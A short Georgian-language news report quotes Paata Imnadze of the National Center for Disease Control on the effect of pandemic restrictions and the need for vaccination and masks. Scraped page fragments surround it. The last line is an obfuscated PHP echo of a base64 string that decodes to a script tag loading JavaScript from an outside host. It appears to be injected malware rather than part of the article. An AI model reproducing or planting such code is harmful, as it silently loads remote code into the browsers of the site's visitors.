celsiusi
ავერსი შნაიდერი
დაავადებათა კონტროლის ეროვნული ცენტრის დირექტორის მოადგილემ, პაატა იმნაძემ საქართველოს მასშტაბით პანდემიის დროს არსებულ შეზღუდვებზე ისაუბრა.
 
მისი თქმით, შეზღუდვებს ეფექტი ჰქონდა.
 
„შეზღუდვებმა თავისი ეფექტურობა აჩვენა. მე ისიც მახსოვს, აქ რომ მეკითხებოდნენ - „ვირუსი რა, ღამით დადის?“. ხომ გამოჩნდა, რომ თურმე ღამით დადიოდა? სანამ შეზღუდვები იყო, ვირუსი ასე გავრცელებული არ იყო, ხომ? აქედან გამომდინარე, შეზღუდვებს თავისი აზრი ჰქონდა მაშინ, როდესაც ჩვენ არ შეგვეძლო შეგვეთავაზებინა საზოგადოებისათვის თავდაცვის ალტერნატიული გზა.
 
დღეს, პირველ რიგში, ვაქცინა გვაქვს და არსებული რეგულაციები, მათი დაცვის შემთხვევაში, გვაძლევს იმის საშუალებას, რომ შეზღუდვები აღარ დავაწესოთ“, - განაცხადა იმნაძემ.
 
მისივე თქმით, აუცილებელია, რომ ვაქცინაციის პროცესი რაც შეიძლება სწრაფად და ეფექტურად უნდა წარიმართოს.
 
„რაც შეიძლება მეტი ადამიანი დროულად უნდა აიცრას და ის რეგულაციები, რაც დღესაც არის, მაგალითად - დახურულ სივრცეში პირბადის ტარება, რაც თავის დაცვის ყველაზე ეფექტური საშუალებაა, აუცილებლად უნდა გავაგრძელოთ“, - აღნიშნა პაატა იმნაძემ.
1094
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");